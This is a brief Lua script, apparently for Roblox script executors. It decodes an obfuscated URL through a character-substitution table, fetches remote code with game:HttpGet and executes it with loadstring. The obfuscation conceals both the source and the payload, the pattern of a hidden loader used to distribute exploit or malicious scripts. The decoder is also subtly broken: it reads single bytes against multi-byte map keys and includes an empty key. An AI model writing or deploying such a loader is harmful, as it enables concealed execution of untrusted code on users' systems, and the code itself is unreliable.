local MAP={
["Ψ"]="://",["Ġ"]=":",[")"]="/",
["Ž"]="a",["q"]="b",["Ŀ"]="c",["g"]="d",["ĕ"]="e",["ë"]="f",["ŏ"]="g",["C"]="h",
["¡"]="i",["đ"]="j",["™"]="k",["ą"]="l",["ÿ"]="m",["Ń"]="n",["ø"]="o",["ē"]="p",
["ŗ"]="r",["Û"]="s",["ŧ"]="t",[""]="u",["j"]="v",["O"]="w",["Ñ"]="x",
["ő"]="y",["ü"]="z"
}

local function d(s)
    local t={}
    for i=1,#s do
        local c=s:sub(i,i)
        t[#t+1]=MAP[c] or c
    end
    return table.concat(t)
end

return function(enc)
    local url=d(enc)
    local src=game:HttpGet(url)
    return loadstring(src)()
end
